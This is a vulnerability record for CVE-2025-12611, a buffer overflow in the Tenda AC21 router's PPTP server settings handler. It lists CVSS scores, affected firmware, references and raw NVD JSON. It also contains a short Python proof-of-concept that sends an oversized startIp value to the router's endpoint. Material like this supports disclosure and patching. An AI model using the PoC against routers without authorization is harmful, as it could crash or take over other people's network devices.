CVE-2025-12611

Description

A vulnerability was identified in Tenda AC21 16.03.08.16. This vulnerability affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg. The manipulation of the argument startIp leads to buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ac21_firmware:16.03.08.16:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:ac21:1.0:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda AC21 16.03.08.16及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-12611 PoC - Tenda AC21 Buffer Overflow in formSetPPTPServer
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys

def exploit_cve_2025_12611(target_ip, username, password, malicious_ip):
    """
    Exploit the buffer overflow vulnerability in Tenda AC21's formSetPPTPServer function.
    
    Args:
        target_ip: IP address of the vulnerable Tenda AC21 router
        username: Router admin username
        password: Router admin password
        malicious_ip: Malicious startIp payload to trigger overflow
    """
    url = f"http://{target_ip}/goform/SetPptpServerCfg"
    
    # Payload with oversized startIp parameter to trigger buffer overflow
    # The exact overflow length may vary based on firmware version
    payload = {
        "startIp": malicious_ip,  # Overflow payload
        "endIp": "192.168.99.254",
        "pptpEnable": "1"
    }
    
    try:
        response = requests.post(url, data=payload, auth=(username, password), timeout=10)
        print(f"[*] Request sent to {url}")
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response: {response.text}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

def generate_overflow_payload(length=500):
    """Generate buffer overflow payload"""
    # Generate pattern that can help identify overflow location
    return "A" * length

if __name__ == "__main__":
    if len(sys.argv) < 5:
        print("Usage: python3 CVE-2025-12611.py <target_ip> <username> <password> <payload_length>")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    payload_length = int(sys.argv[4]) if len(sys.argv) > 4 else 500
    
    malicious_ip = generate_overflow_payload(payload_length)
    exploit_cve_2025_12611(target_ip, username, password, malicious_ip)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12611
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12611
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12611/
[4] VulDB https://vuldb.com/cve/CVE-2025-12611
[5] https://github.com/LX-LX88/cve/issues/10
[6] https://vuldb.com/?ctiid.330906
[7] https://vuldb.com/?id.330906
[8] https://vuldb.com/?submit.678491
[9] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12611", "sourceIdentifier": "[email protected]", "published": "2025-11-03T03:15:40.760", "lastModified": "2025-11-05T16:09:23.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Tenda AC21 16.03.08.16. This vulnerability affects the function formSetPPTPServer of the file /goform/SetPptpServerCfg. The manipulation of the argument startIp leads to buffer overflow. Remote exploitation of the attack is possible. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac21_firmware:16.03.08.16:*:*:*:*:*:*:*", "matchCriteriaId": "089AC516-5475-4725-B348-832A00ED0CC3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac21:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BCFA3A9C-39E8-46C1-B5C8-928EA45EBCDB"}]}]}], "references": [{"url": "https://github.com/LX-LX88/cve/issues/10", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.330906", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330906", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.678491", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}